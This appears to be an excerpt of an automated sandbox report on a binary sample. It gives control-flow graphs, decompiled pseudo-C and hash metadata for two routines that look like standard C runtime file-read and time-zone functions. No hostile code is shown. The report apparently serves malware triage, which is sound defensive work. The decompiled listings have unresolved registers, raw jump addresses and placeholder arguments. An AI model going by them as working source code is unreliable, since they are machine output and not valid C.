                                                                                                                                                                                                                              control_flow_graph 727 7ff735c5a588-7ff735c5a5a9 728 7ff735c5a5ab-7ff735c5a5be call 7ff735c53af8 call 7ff735c53b18 727->728 729 7ff735c5a5c3-7ff735c5a5c5 727->729 743 7ff735c5a9bf 728->743 730 7ff735c5a5cb-7ff735c5a5d2 729->730 731 7ff735c5a9a7-7ff735c5a9b4 call 7ff735c53af8 call 7ff735c53b18 729->731 730->731 734 7ff735c5a5d8-7ff735c5a60c 730->734 750 7ff735c5a9ba call 7ff735c59400 731->750 734->731 737 7ff735c5a612-7ff735c5a619 734->737 740 7ff735c5a61b-7ff735c5a62e call 7ff735c53af8 call 7ff735c53b18 737->740 741 7ff735c5a633-7ff735c5a636 737->741 740->750 746 7ff735c5a63c-7ff735c5a63e 741->746 747 7ff735c5a9a3-7ff735c5a9a5 741->747 748 7ff735c5a9c2-7ff735c5a9d1 743->748 746->747 751 7ff735c5a644-7ff735c5a647 746->751 747->748 750->743 751->740 754 7ff735c5a649-7ff735c5a66d 751->754 755 7ff735c5a66f-7ff735c5a672 754->755 756 7ff735c5a6a2-7ff735c5a6aa 754->756 758 7ff735c5a69a-7ff735c5a6a0 755->758 759 7ff735c5a674-7ff735c5a67c 755->759 760 7ff735c5a6ac-7ff735c5a6d6 call 7ff735c5c140 call 7ff735c59468 * 2 756->760 761 7ff735c5a67e-7ff735c5a695 call 7ff735c53af8 call 7ff735c53b18 call 7ff735c59400 756->761 763 7ff735c5a721-7ff735c5a732 758->763 759->758 759->761 788 7ff735c5a6d8-7ff735c5a6ee call 7ff735c53b18 call 7ff735c53af8 760->788 789 7ff735c5a6f3-7ff735c5a71d call 7ff735c5adb8 760->789 792 7ff735c5a831 761->792 766 7ff735c5a738-7ff735c5a740 763->766 767 7ff735c5a7b9-7ff735c5a7c3 call 7ff735c61cd4 763->767 766->767 771 7ff735c5a742-7ff735c5a744 766->771 779 7ff735c5a7c9-7ff735c5a7df 767->779 780 7ff735c5a84f 767->780 771->767 775 7ff735c5a746-7ff735c5a764 771->775 775->767 781 7ff735c5a766-7ff735c5a772 775->781 779->780 785 7ff735c5a7e1-7ff735c5a7f3 GetConsoleMode 779->785 783 7ff735c5a854-7ff735c5a875 ReadFile 780->783 781->767 786 7ff735c5a774-7ff735c5a776 781->786 790 7ff735c5a87b-7ff735c5a883 783->790 791 7ff735c5a96d-7ff735c5a976 GetLastError 783->791 785->780 793 7ff735c5a7f5-7ff735c5a7fd 785->793 786->767 787 7ff735c5a778-7ff735c5a790 786->787 787->767 794 7ff735c5a792-7ff735c5a79e 787->794 788->792 789->763 790->791 796 7ff735c5a889 790->796 799 7ff735c5a978-7ff735c5a98e call 7ff735c53b18 call 7ff735c53af8 791->799 800 7ff735c5a993-7ff735c5a996 791->800 801 7ff735c5a834-7ff735c5a83e call 7ff735c59468 792->801 793->783 798 7ff735c5a7ff-7ff735c5a822 ReadConsoleW 793->798 794->767 803 7ff735c5a7a0-7ff735c5a7a2 794->803 807 7ff735c5a890-7ff735c5a8a7 796->807 809 7ff735c5a824 GetLastError 798->809 810 7ff735c5a843-7ff735c5a84d 798->810 799->792 804 7ff735c5a99c-7ff735c5a99e 800->804 805 7ff735c5a82a-7ff735c5a82c call 7ff735c53a8c 800->805 801->748 803->767 813 7ff735c5a7a4-7ff735c5a7b4 803->813 804->801 805->792 807->801 815 7ff735c5a8a9-7ff735c5a8b4 807->815 809->805 810->807 813->767 820 7ff735c5a8db-7ff735c5a8e3 815->820 821 7ff735c5a8b6-7ff735c5a8cf call 7ff735c5a198 815->821 824 7ff735c5a95b-7ff735c5a968 call 7ff735c59fc0 820->824 825 7ff735c5a8e5-7ff735c5a8f7 820->825 827 7ff735c5a8d4-7ff735c5a8d6 821->827 824->827 828 7ff735c5a94e-7ff735c5a956 825->828 829 7ff735c5a8f9 825->829 827->801 828->801 831 7ff735c5a8ff-7ff735c5a906 829->831 832 7ff735c5a908-7ff735c5a90c 831->832 833 7ff735c5a943-7ff735c5a948 831->833 834 7ff735c5a90e-7ff735c5a915 832->834 835 7ff735c5a929 832->835 833->828 834->835 836 7ff735c5a917-7ff735c5a91b 834->836 837 7ff735c5a92f-7ff735c5a93f 835->837 836->835 838 7ff735c5a91d-7ff735c5a927 836->838 837->831 839 7ff735c5a941 837->839 838->837 839->828
                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                              			E00007FF77FF735C5A588(signed int __ecx, void* __esi, signed int* __rax, void* __rcx, long long __rdx, long long __r8, char _a8, long long _a16, intOrPtr _a32) {
				signed int* _v72;
				char _v80;
				signed int _v88;
				signed int* _v96;
				void* _v104;
				signed int _v120;
				void* __rbx;
				void* __rdi;
				signed char _t127;
				signed int _t141;
				int _t150;
				void* _t151;
				void* _t155;
				char _t169;
				char _t170;
				signed int _t174;
				void* _t192;
				void* _t193;
				void* _t194;
				unsigned int _t196;
				void* _t199;
				long long _t204;
				signed int* _t240;
				signed long long _t247;
				signed short* _t251;
				signed int* _t253;
				void* _t254;
				signed int* _t255;
				intOrPtr _t264;
				intOrPtr _t265;
				signed long long _t271;
				long long _t282;
				unsigned long long _t283;
				signed short* _t285;
				signed long long _t288;
				signed long long _t289;
				signed short* _t293;
				signed short* _t295;
				unsigned long long _t297;
				signed long long _t298;
				signed int* _t300;
				char* _t301;
				char* _t302;

				_t282 = __r8;
				_a16 = __rdx;
				r13d = r8d;
				if (r12d != 0xfffffffe) goto 0x35c5a5c3;
				E00007FF77FF735C53AF8(__rax);
				 *__rax =  *__rax & 0x00000000;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 9;
				goto 0x35c5a9bf;
				if (__ecx < 0) goto 0x35c5a9a7;
				_t199 = r12d -  *0x35c8ae40; // 0x40
				if (_t199 >= 0) goto 0x35c5a9a7;
				r8d = 1;
				_v80 = __r8;
				_t288 = __ecx >> 6;
				_v88 = _t288;
				_t298 = __ecx + __ecx * 8;
				_t264 =  *((intOrPtr*)(0x35c8aa40 + _t288 * 8));
				if ((r8b &  *(_t264 + 0x38 + _t298 * 8)) == 0) goto 0x35c5a9a7;
				if (r13d - 0x7fffffff <= 0) goto 0x35c5a633;
				E00007FF77FF735C53AF8(__ecx);
				 *__ecx =  *__ecx & 0x00000000;
				_t127 = E00007FF77FF735C53B18(__ecx);
				 *__ecx = 0x16;
				goto 0x35c5a9ba;
				if (r13d == 0) goto 0x35c5a9a3;
				if ((_t127 & 0x00000002) != 0) goto 0x35c5a9a3;
				_t204 = __rdx;
				if (_t204 == 0) goto 0x35c5a61b;
				r11d =  *((char*)(_t264 + 0x39 + _t298 * 8));
				_t240 =  *((intOrPtr*)(_t264 + 0x28 + _t298 * 8));
				_v96 = _t240;
				_a8 = r11b;
				_t23 = _t254 + 4; // 0x4
				r15d = _t23;
				if (_t204 == 0) goto 0x35c5a6a2;
				if (r11d - r8d != r8d) goto 0x35c5a69a;
				if ((r8b &  !r13d) != 0) goto 0x35c5a69a;
				E00007FF77FF735C53AF8(_t240);
				 *_t240 =  *_t240 & 0;
				E00007FF77FF735C53B18(_t240);
				 *_t240 = 0x16;
				E00007FF77FF735C59400();
				goto 0x35c5a831;
				goto 0x35c5a721;
				if ((r8b &  !r13d) == 0) goto 0x35c5a67e;
				_t192 =  <  ? r15d : r13d >> 1;
				E00007FF77FF735C5C140(_t240, __rcx);
				_t255 = _t240;
				E00007FF77FF735C59468(_t240, __rcx);
				E00007FF77FF735C59468(_t240, __rcx);
				_t300 = _t255;
				if (_t255 != 0) goto 0x35c5a6f3;
				E00007FF77FF735C53B18(_t240);
				 *_t240 = 0xc;
				E00007FF77FF735C53AF8(_t240);
				 *_t240 = 8;
				goto 0x35c5a831;
				_t28 = _t264 + 1; // 0x1
				r8d = _t28;
				E00007FF77FF735C5ADB8(_t240, _t255, 0x35c8aa40);
				_t289 = _v88;
				r8d = 1;
				r11b = _a8;
				 *( *((intOrPtr*)(0x35c8aa40 + _t289 * 8)) + 0x30 + _t298 * 8) = _t240;
				_t265 =  *((intOrPtr*)(0x35c8aa40 + _t289 * 8));
				_v72 = _t300;
				r10d = 0x7ff735c8aa4a;
				if (( *(_t265 + 0x38 + _t298 * 8) & 0x00000048) == 0) goto 0x35c5a7b9;
				_t141 =  *((intOrPtr*)(_t265 + 0x3a + _t298 * 8));
				if (_t141 == r10b) goto 0x35c5a7b9;
				if (_t192 == 0) goto 0x35c5a7b9;
				 *_t300 = _t141;
				_t301 = _t300 + _t282;
				_t193 = _t192 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x35c8aa40 + _t289 * 8)) + 0x3a + _t298 * 8)) = r10b;
				if (r11b == 0) goto 0x35c5a7b9;
				_t169 =  *((intOrPtr*)( *((intOrPtr*)(0x35c8aa40 + _t289 * 8)) + 0x3b + _t298 * 8));
				if (_t169 == r10b) goto 0x35c5a7b9;
				if (_t193 == 0) goto 0x35c5a7b9;
				 *_t301 = _t169;
				_t302 = _t301 + _t282;
				_t194 = _t193 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x35c8aa40 + _t289 * 8)) + 0x3b + _t298 * 8)) = r10b;
				if (r11b != r8b) goto 0x35c5a7b9;
				_t170 =  *((intOrPtr*)( *((intOrPtr*)(0x35c8aa40 + _t289 * 8)) + 0x3c + _t298 * 8));
				if (_t170 == r10b) goto 0x35c5a7b9;
				if (_t194 == 0) goto 0x35c5a7b9;
				 *_t302 = _t170;
				 *((intOrPtr*)( *((intOrPtr*)(0x35c8aa40 + _t289 * 8)) + 0x3c + _t298 * 8)) = r10b;
				if (E00007FF77FF735C61CD4(r12d,  *((intOrPtr*)(0x35c8aa40 + _t289 * 8))) == 0) goto 0x35c5a84f;
				_t247 =  *((intOrPtr*)(0x35c8aa40 + _v88 * 8));
				if ( *((char*)(_t247 + 0x38 + _t298 * 8)) >= 0) goto 0x35c5a84f;
				if (GetConsoleMode(??, ??) == 0) goto 0x35c5a84f;
				if (_a8 != 2) goto 0x35c5a854;
				_v120 = _v120 & 0x00000000;
				_t196 = _t194 - 1 >> 1;
				r8d = _t196;
				if (ReadConsoleW(??, ??, ??, ??, ??) != 0) goto 0x35c5a843;
				E00007FF77FF735C53A8C(GetLastError(), _t247, _v96);
				E00007FF77FF735C59468(_t247, _t255);
				goto 0x35c5a9c2;
				goto 0x35c5a890;
				_v80 = 0;
				_v120 = _v120 & 0x00000000;
				r8d = _t196;
				_t150 = ReadFile(??, ??, ??, ??, ??); // executed
				if (_t150 == 0) goto 0x35c5a96d;
				if (_a32 - r13d > 0) goto 0x35c5a96d;
				if ( *((char*)( *((intOrPtr*)(0x35c8aa40 + _v88 * 8)) + 0x38 + _t298 * 8)) >= 0) goto 0x35c5a834;
				_t283 = 0x35c8aa40 + _t247 * 2 + _a32;
				if (_a8 == 2) goto 0x35c5a8db;
				_t271 = _t302 + _t282;
				_v120 = _t297 >> 1;
				_t151 = E00007FF77FF735C5A198(_t150, 0, r12d, __esi, _t255, _t271, _t283, _a16);
				goto 0x35c5a834;
				if (_v80 == 0) goto 0x35c5a95b;
				_t295 = _v72;
				_t251 = _t295;
				_t293 =  &(_t295[_t283 >> 1]);
				if (_t295 - _t293 >= 0) goto 0x35c5a94e;
				r11d = 0xa;
				_t174 =  *_t251 & 0x0000ffff;
				if (_t174 == 0x1a) goto 0x35c5a943;
				if (_t174 != 0xd) goto 0x35c5a929;
				_t285 =  &(_t251[1]);
				if (_t285 - _t293 >= 0) goto 0x35c5a929;
				if ( *_t285 != r11w) goto 0x35c5a929;
				r8d = 4;
				goto 0x35c5a92f;
				r8d = 2;
				 *_t295 = r11w & 0xffffffff;
				if (_t251 + _t285 - _t293 < 0) goto 0x35c5a8ff;
				goto 0x35c5a94e;
				_t253 =  *((intOrPtr*)(0x35c8aa40 + _t271 * 8));
				 *(_t253 + 0x38 + _t298 * 8) =  *(_t253 + 0x38 + _t298 * 8) | 0x00000002;
				goto 0x35c5a834;
				E00007FF77FF735C59FC0(_t151, r12d, _t196, _v72,  &(_t295[1]));
				goto 0x35c5a8d4;
				if (GetLastError() != 5) goto 0x35c5a993;
				E00007FF77FF735C53B18(_t253);
				 *_t253 = 9;
				_t155 = E00007FF77FF735C53AF8(_t253);
				 *_t253 = 5;
				goto 0x35c5a831;
				if (_t155 != 0x6d) goto 0x35c5a82a;
				goto 0x35c5a834;
				goto 0x35c5a9c2;
				E00007FF77FF735C53AF8(_t253);
				 *_t253 =  *_t253 & 0x00000000;
				E00007FF77FF735C53B18(_t253);
				 *_t253 = 9;
				return E00007FF77FF735C59400() | 0xffffffff;
			}














































                                                                                                                                                                                                                              0x7ff735c5a588
                                                                                                                                                                                                                              0x7ff735c5a588
                                                                                                                                                                                                                              0x7ff735c5a5a2
                                                                                                                                                                                                                              0x7ff735c5a5a9
                                                                                                                                                                                                                              0x7ff735c5a5ab
                                                                                                                                                                                                                              0x7ff735c5a5b0
                                                                                                                                                                                                                              0x7ff735c5a5b3
                                                                                                                                                                                                                              0x7ff735c5a5b8
                                                                                                                                                                                                                              0x7ff735c5a5be
                                                                                                                                                                                                                              0x7ff735c5a5c5
                                                                                                                                                                                                                              0x7ff735c5a5cb
                                                                                                                                                                                                                              0x7ff735c5a5d2
                                                                                                                                                                                                                              0x7ff735c5a5e5
                                                                                                                                                                                                                              0x7ff735c5a5ee
                                                                                                                                                                                                                              0x7ff735c5a5f3
                                                                                                                                                                                                                              0x7ff735c5a5f7
                                                                                                                                                                                                                              0x7ff735c5a5fc
                                                                                                                                                                                                                              0x7ff735c5a600
                                                                                                                                                                                                                              0x7ff735c5a60c
                                                                                                                                                                                                                              0x7ff735c5a619
                                                                                                                                                                                                                              0x7ff735c5a61b
                                                                                                                                                                                                                              0x7ff735c5a620
                                                                                                                                                                                                                              0x7ff735c5a623
                                                                                                                                                                                                                              0x7ff735c5a628
                                                                                                                                                                                                                              0x7ff735c5a62e
                                                                                                                                                                                                                              0x7ff735c5a636
                                                                                                                                                                                                                              0x7ff735c5a63e
                                                                                                                                                                                                                              0x7ff735c5a644
                                                                                                                                                                                                                              0x7ff735c5a647
                                                                                                                                                                                                                              0x7ff735c5a649
                                                                                                                                                                                                                              0x7ff735c5a651
                                                                                                                                                                                                                              0x7ff735c5a659
                                                                                                                                                                                                                              0x7ff735c5a65e
                                                                                                                                                                                                                              0x7ff735c5a666
                                                                                                                                                                                                                              0x7ff735c5a666
                                                                                                                                                                                                                              0x7ff735c5a66d
                                                                                                                                                                                                                              0x7ff735c5a672
                                                                                                                                                                                                                              0x7ff735c5a67c
                                                                                                                                                                                                                              0x7ff735c5a67e
                                                                                                                                                                                                                              0x7ff735c5a683
                                                                                                                                                                                                                              0x7ff735c5a685
                                                                                                                                                                                                                              0x7ff735c5a68a
                                                                                                                                                                                                                              0x7ff735c5a690
                                                                                                                                                                                                                              0x7ff735c5a695
                                                                                                                                                                                                                              0x7ff735c5a6a0
                                                                                                                                                                                                                              0x7ff735c5a6aa
                                                                                                                                                                                                                              0x7ff735c5a6b4
                                                                                                                                                                                                                              0x7ff735c5a6ba
                                                                                                                                                                                                                              0x7ff735c5a6c1
                                                                                                                                                                                                                              0x7ff735c5a6c4
                                                                                                                                                                                                                              0x7ff735c5a6cb
                                                                                                                                                                                                                              0x7ff735c5a6d0
                                                                                                                                                                                                                              0x7ff735c5a6d6
                                                                                                                                                                                                                              0x7ff735c5a6d8
                                                                                                                                                                                                                              0x7ff735c5a6dd
                                                                                                                                                                                                                              0x7ff735c5a6e3
                                                                                                                                                                                                                              0x7ff735c5a6e8
                                                                                                                                                                                                                              0x7ff735c5a6ee
                                                                                                                                                                                                                              0x7ff735c5a6f8
                                                                                                                                                                                                                              0x7ff735c5a6f8
                                                                                                                                                                                                                              0x7ff735c5a6fc
                                                                                                                                                                                                                              0x7ff735c5a701
                                                                                                                                                                                                                              0x7ff735c5a706
                                                                                                                                                                                                                              0x7ff735c5a70c
                                                                                                                                                                                                                              0x7ff735c5a718
                                                                                                                                                                                                                              0x7ff735c5a71d
                                                                                                                                                                                                                              0x7ff735c5a723
                                                                                                                                                                                                                              0x7ff735c5a72e
                                                                                                                                                                                                                              0x7ff735c5a732
                                                                                                                                                                                                                              0x7ff735c5a738
                                                                                                                                                                                                                              0x7ff735c5a740
                                                                                                                                                                                                                              0x7ff735c5a744
                                                                                                                                                                                                                              0x7ff735c5a746
                                                                                                                                                                                                                              0x7ff735c5a754
                                                                                                                                                                                                                              0x7ff735c5a757
                                                                                                                                                                                                                              0x7ff735c5a75c
                                                                                                                                                                                                                              0x7ff735c5a764
                                                                                                                                                                                                                              0x7ff735c5a76a
                                                                                                                                                                                                                              0x7ff735c5a772
                                                                                                                                                                                                                              0x7ff735c5a776
                                                                                                                                                                                                                              0x7ff735c5a778
                                                                                                                                                                                                                              0x7ff735c5a783
                                                                                                                                                                                                                              0x7ff735c5a786
                                                                                                                                                                                                                              0x7ff735c5a788
                                                                                                                                                                                                                              0x7ff735c5a790
                                                                                                                                                                                                                              0x7ff735c5a796
                                                                                                                                                                                                                              0x7ff735c5a79e
                                                                                                                                                                                                                              0x7ff735c5a7a2
                                                                                                                                                                                                                              0x7ff735c5a7a4
                                                                                                                                                                                                                              0x7ff735c5a7b4
                                                                                                                                                                                                                              0x7ff735c5a7c3
                                                                                                                                                                                                                              0x7ff735c5a7d5
                                                                                                                                                                                                                              0x7ff735c5a7df
                                                                                                                                                                                                                              0x7ff735c5a7f3
                                                                                                                                                                                                                              0x7ff735c5a7fd
                                                                                                                                                                                                                              0x7ff735c5a80c
                                                                                                                                                                                                                              0x7ff735c5a815
                                                                                                                                                                                                                              0x7ff735c5a817
                                                                                                                                                                                                                              0x7ff735c5a822
                                                                                                                                                                                                                              0x7ff735c5a82c
                                                                                                                                                                                                                              0x7ff735c5a837
                                                                                                                                                                                                                              0x7ff735c5a83e
                                                                                                                                                                                                                              0x7ff735c5a84d
                                                                                                                                                                                                                              0x7ff735c5a84f
                                                                                                                                                                                                                              0x7ff735c5a861
                                                                                                                                                                                                                              0x7ff735c5a867
                                                                                                                                                                                                                              0x7ff735c5a86d
                                                                                                                                                                                                                              0x7ff735c5a875
                                                                                                                                                                                                                              0x7ff735c5a883
                                                                                                                                                                                                                              0x7ff735c5a8a7
                                                                                                                                                                                                                              0x7ff735c5a8b1
                                                                                                                                                                                                                              0x7ff735c5a8b4
                                                                                                                                                                                                                              0x7ff735c5a8c4
                                                                                                                                                                                                                              0x7ff735c5a8ca
                                                                                                                                                                                                                              0x7ff735c5a8cf
                                                                                                                                                                                                                              0x7ff735c5a8d6
                                                                                                                                                                                                                              0x7ff735c5a8e3
                                                                                                                                                                                                                              0x7ff735c5a8e5
                                                                                                                                                                                                                              0x7ff735c5a8ea
                                                                                                                                                                                                                              0x7ff735c5a8f0
                                                                                                                                                                                                                              0x7ff735c5a8f7
                                                                                                                                                                                                                              0x7ff735c5a8f9
                                                                                                                                                                                                                              0x7ff735c5a8ff
                                                                                                                                                                                                                              0x7ff735c5a906
                                                                                                                                                                                                                              0x7ff735c5a90c
                                                                                                                                                                                                                              0x7ff735c5a90e
                                                                                                                                                                                                                              0x7ff735c5a915
                                                                                                                                                                                                                              0x7ff735c5a91b
                                                                                                                                                                                                                              0x7ff735c5a921
                                                                                                                                                                                                                              0x7ff735c5a927
                                                                                                                                                                                                                              0x7ff735c5a929
                                                                                                                                                                                                                              0x7ff735c5a932
                                                                                                                                                                                                                              0x7ff735c5a93f
                                                                                                                                                                                                                              0x7ff735c5a941
                                                                                                                                                                                                                              0x7ff735c5a943
                                                                                                                                                                                                                              0x7ff735c5a948
                                                                                                                                                                                                                              0x7ff735c5a956
                                                                                                                                                                                                                              0x7ff735c5a963
                                                                                                                                                                                                                              0x7ff735c5a968
                                                                                                                                                                                                                              0x7ff735c5a976
                                                                                                                                                                                                                              0x7ff735c5a978
                                                                                                                                                                                                                              0x7ff735c5a97d
                                                                                                                                                                                                                              0x7ff735c5a983
                                                                                                                                                                                                                              0x7ff735c5a988
                                                                                                                                                                                                                              0x7ff735c5a98e
                                                                                                                                                                                                                              0x7ff735c5a996
                                                                                                                                                                                                                              0x7ff735c5a99e
                                                                                                                                                                                                                              0x7ff735c5a9a5
                                                                                                                                                                                                                              0x7ff735c5a9a7
                                                                                                                                                                                                                              0x7ff735c5a9ac
                                                                                                                                                                                                                              0x7ff735c5a9af
                                                                                                                                                                                                                              0x7ff735c5a9b4
                                                                                                                                                                                                                              0x7ff735c5a9d1

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 0b47f0aba078374d7057434b19c023291ed652ae620a84dc44c84b1b4932805d
                                                                                                                                                                                                                              • Instruction ID: 56e854d1fc419a2080c4ae2c29d8d391e292da3fb9df3affe7fb4f484e66b937
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b47f0aba078374d7057434b19c023291ed652ae620a84dc44c84b1b4932805d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76C1BDA3A08687B5E7616AA398403BDA7A1FB40F89FC50931DE4E07791CF7CE455E720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C64260 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 840 7ff735c64260-7ff735c64295 call 7ff735c63974 call 7ff735c6397c call 7ff735c639e4 847 7ff735c6429b-7ff735c642a6 call 7ff735c63984 840->847 848 7ff735c643d3-7ff735c64441 call 7ff735c59420 call 7ff735c5fc38 840->848 847->848 854 7ff735c642ac-7ff735c642b7 call 7ff735c639b4 847->854 860 7ff735c64443-7ff735c6444a 848->860 861 7ff735c6444f-7ff735c64452 848->861 854->848 859 7ff735c642bd-7ff735c642e0 call 7ff735c59468 GetTimeZoneInformation 854->859 870 7ff735c643a8-7ff735c643d2 call 7ff735c6396c call 7ff735c6395c call 7ff735c63964 859->870 871 7ff735c642e6-7ff735c64307 859->871 863 7ff735c644df-7ff735c644e2 860->863 864 7ff735c64489-7ff735c6449c call 7ff735c5c140 861->864 865 7ff735c64454 861->865 867 7ff735c64457 863->867 868 7ff735c644e8-7ff735c644f0 call 7ff735c63fe4 863->868 881 7ff735c6449e 864->881 882 7ff735c644a7-7ff735c644c2 call 7ff735c5fc38 864->882 865->867 872 7ff735c6445c-7ff735c64488 call 7ff735c59468 call 7ff735c4a410 867->872 873 7ff735c64457 call 7ff735c64260 867->873 868->872 876 7ff735c64309-7ff735c6430f 871->876 877 7ff735c64312-7ff735c64319 871->877 873->872 876->877 885 7ff735c6431b-7ff735c64323 877->885 886 7ff735c6432d 877->886 883 7ff735c644a0-7ff735c644a5 call 7ff735c59468 881->883 896 7ff735c644c9-7ff735c644db call 7ff735c59468 882->896 897 7ff735c644c4-7ff735c644c7 882->897 883->865 885->886 891 7ff735c64325-7ff735c6432b 885->891 893 7ff735c6432f-7ff735c643a3 call 7ff735c4b800 * 4 call 7ff735c611c8 call 7ff735c644f8 * 2 886->893 891->893 893->870 896->863 897->883
                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                              			E00007FF77FF735C64260(void* __eflags, signed int* __rax, long long __rbx, void* __rdx, void* __r8, void* __r9, signed int _a8, signed int _a16, signed int _a24, long long _a32) {
				void* __rsi;
				void* _t21;
				void* _t22;
				long _t28;
				intOrPtr _t31;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;
				void* _t40;
				void* _t41;
				void* _t42;
				signed int _t44;
				signed int _t53;
				intOrPtr _t63;
				intOrPtr _t64;
				signed int* _t67;
				long long _t73;
				void* _t90;
				void* _t93;

				_t93 = __r9;
				_t90 = __r8;
				_t81 = __rdx;
				_t68 = __rbx;
				_t67 = __rax;
				_a32 = __rbx;
				_t22 = E00007FF77FF735C63974(_t21);
				_t84 = _t67;
				E00007FF77FF735C6397C(_t22);
				_a8 = 0;
				_t85 = _t67;
				_a16 = 0;
				_a24 = 0;
				if (E00007FF77FF735C639E4(_t67,  &_a8) != 0) goto 0x35c643d3;
				if (E00007FF77FF735C63984(_t67,  &_a16) != 0) goto 0x35c643d3;
				if (E00007FF77FF735C639B4(_t67,  &_a24) != 0) goto 0x35c643d3;
				_t73 =  *0x35c8b2a0; // 0x0
				E00007FF77FF735C59468(_t67, _t73);
				 *0x35c8b2a0 = __rbx; // executed
				_t28 = GetTimeZoneInformation(??); // executed
				if (_t28 == 0xffffffff) goto 0x35c643a8;
				_t53 =  *0x35c8b2c0 * 0x3c;
				_t8 = _t68 + 1; // 0x1
				_t63 =  *0x35c8b306; // 0xb
				r8d =  *0x35c8b314; // 0x0
				 *0x35c8b2b0 = _t8;
				_a8 = _t53;
				if (_t63 == 0) goto 0x35c64312;
				_a8 = r8d * 0x3c + _t53;
				_t64 =  *0x35c8b35a; // 0x3
				if (_t64 == 0) goto 0x35c6432d;
				_t31 =  *0x35c8b368; // 0xffffffc4
				if (_t31 == 0) goto 0x35c6432d;
				_t44 = (_t31 - r8d) * 0x3c;
				goto 0x35c6432f;
				_a24 = _t44;
				_a16 = _t44;
				r8d = 0x80;
				_t33 = E00007FF77FF735C4B800(_t31 - r8d, 0,  *_t67, __rdx, _t90);
				r8d = 0x80;
				_t34 = E00007FF77FF735C4B800(_t33, 0, _t67[2], __rdx, _t90);
				r8d = 0x40;
				_t35 = E00007FF77FF735C4B800(_t34, 0,  *_t67, __rdx, _t90);
				r8d = 0x40;
				E00007FF77FF735C4B800(_t35, 0, _t67[2], __rdx, _t90);
				_t37 = E00007FF77FF735C611C8(_t44, 0, _t67, __rbx, _t67[2], _t81, _t67, _t93);
				r9d = _t37;
				E00007FF77FF735C644F8(__rbx, 0x35c8b2c4,  *_t85, _t85,  *_t84, _t93);
				r9d = _t37;
				_t40 = E00007FF77FF735C6396C(E00007FF77FF735C644F8(_t68, 0x35c8b318, _t85[2], _t85, _t84[2], _t93));
				 *_t67 = _a8;
				_t41 = E00007FF77FF735C6395C(_t40);
				 *_t67 = _a16;
				_t42 = E00007FF77FF735C63964(_t41);
				 *_t67 = _a24;
				return _t42;
			}























                                                                                                                                                                                                                              0x7ff735c64260
                                                                                                                                                                                                                              0x7ff735c64260
                                                                                                                                                                                                                              0x7ff735c64260
                                                                                                                                                                                                                              0x7ff735c64260
                                                                                                                                                                                                                              0x7ff735c64260
                                                                                                                                                                                                                              0x7ff735c64260
                                                                                                                                                                                                                              0x7ff735c6426f
                                                                                                                                                                                                                              0x7ff735c64274
                                                                                                                                                                                                                              0x7ff735c64277
                                                                                                                                                                                                                              0x7ff735c64282
                                                                                                                                                                                                                              0x7ff735c64285
                                                                                                                                                                                                                              0x7ff735c64288
                                                                                                                                                                                                                              0x7ff735c6428b
                                                                                                                                                                                                                              0x7ff735c64295
                                                                                                                                                                                                                              0x7ff735c642a6
                                                                                                                                                                                                                              0x7ff735c642b7
                                                                                                                                                                                                                              0x7ff735c642bd
                                                                                                                                                                                                                              0x7ff735c642c4
                                                                                                                                                                                                                              0x7ff735c642d0
                                                                                                                                                                                                                              0x7ff735c642d7
                                                                                                                                                                                                                              0x7ff735c642e0
                                                                                                                                                                                                                              0x7ff735c642e6
                                                                                                                                                                                                                              0x7ff735c642ed
                                                                                                                                                                                                                              0x7ff735c642f0
                                                                                                                                                                                                                              0x7ff735c642f7
                                                                                                                                                                                                                              0x7ff735c642fe
                                                                                                                                                                                                                              0x7ff735c64304
                                                                                                                                                                                                                              0x7ff735c64307
                                                                                                                                                                                                                              0x7ff735c6430f
                                                                                                                                                                                                                              0x7ff735c64312
                                                                                                                                                                                                                              0x7ff735c64319
                                                                                                                                                                                                                              0x7ff735c6431b
                                                                                                                                                                                                                              0x7ff735c64323
                                                                                                                                                                                                                              0x7ff735c64328
                                                                                                                                                                                                                              0x7ff735c6432b
                                                                                                                                                                                                                              0x7ff735c6432f
                                                                                                                                                                                                                              0x7ff735c64334
                                                                                                                                                                                                                              0x7ff735c6433f
                                                                                                                                                                                                                              0x7ff735c64342
                                                                                                                                                                                                                              0x7ff735c6434b
                                                                                                                                                                                                                              0x7ff735c64350
                                                                                                                                                                                                                              0x7ff735c6435d
                                                                                                                                                                                                                              0x7ff735c64362
